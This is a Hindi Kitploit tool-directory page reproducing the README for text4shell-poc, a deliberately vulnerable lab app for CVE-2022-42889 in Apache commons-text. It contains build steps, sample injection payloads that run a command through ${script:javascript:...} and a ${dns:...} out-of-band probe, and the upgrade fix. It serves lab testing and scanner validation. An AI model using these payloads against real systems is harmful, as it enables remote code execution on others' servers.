Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
text4shell-poc — CVE-2022-42889 के परीक्षण के लिए प्रूफ ऑफ कॉन्सेप्ट एप्लिकेशन | Kitploit
उपकरण/GitHubGitHub/securekomodo/text4shell-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubsecurekomodo/text4shell-poc

text4shell-poc

CVE-2022-42889 के परीक्षण के लिए प्रूफ ऑफ कॉन्सेप्ट एप्लिकेशन

रिपॉजिटरी देखें
8113 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-42889 PoC परीक्षण एप्लिकेशन

यह एक कमजोर एप्लिकेशन है जिसे CVE-2022-42889 भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट के रूप में विकसित किया गया है।

Maven स्थापना

इसे चलाने के लिए आपको आवश्यकता होगी:

  • JDK 17 या उससे ऊपर
  • Maven
  1. Git रिपॉजिटरी क्लोन करें
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. JAR बनाने के लिए Maven इंस्टॉल करें
root@kitploit:~
mvn clean install

यह ./target फ़ोल्डर बनाएगा और उस फ़ोल्डर के अंदर JAR फ़ाइल text4shell-poc-0.0.1-SNAPSHOT.jar होनी चाहिए।

  1. वेबसर्वर शुरू करें
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

यह आपके localhost पर डिफ़ॉल्ट रूप से पोर्ट 8080 पर सुनने वाला एक वेब सर्वर शुरू करेगा।

  1. वेबसर्वर पर ब्राउज़ करें

http://localhost:8080/ पर वेबसर्वर तक पहुंचें और आपको निम्न आउटपुट दिखना चाहिए

root@kitploit:~
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. मैन्युअल रूप से शोषण करें या text4shell-scan का उपयोग करके स्कैन करें

नमूना शोषण पेलोड

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

सफल शोषण प्रदर्शन के लिए अनुशंसित URL एन्कोडर: https://www.urlencoder.org/.

Docker

वैकल्पिक रूप से आप इस PoC को चलाने के लिए Docker का उपयोग कर सकते हैं:

  1. Git रिपॉजिटरी क्लोन करें
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Docker बिल्ड
root@kitploit:~
docker build --tag=text4shell-poc .
  1. Docker रन
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. कमजोर ऐप का परीक्षण करें
root@kitploit:~
http://localhost/
  1. हमला नीचे दिखाए अनुसार एक स्ट्रिंग “${prefix:name}” पास करके किया जा सकता है:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

सफल शोषण प्रदर्शन के लिए अनुशंसित URL एन्कोडर: https://www.urlencoder.org/.

वैकल्पिक रूप से आप text4shell-scan जैसे स्कैनिंग टूल की प्रभावशीलता को मान्य कर सकते हैं

क्या आप कमजोर हैं?

आपके कोड के कमजोर होने के लिए आपको आवश्यकता है:

  • Apache commons-text का संस्करण 1.5.0 से 1.10.0 (लेकिन शामिल नहीं) तक चला रहे हों
  • अपने StringSubstitution के लिए Interpolation का उपयोग कर रहे हों (देखें https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html) - ध्यान दें कि यह बहुत सामान्य नहीं है

समाधान

इसका समाधान आपके commons-text के इंस्टेंस को संस्करण 1.10.0 या बाद में अपडेट करना है।

लेखक

Bryan Smith

  • ट्विटर: https://twitter.com/securekomodo
टूल डाउनलोड करें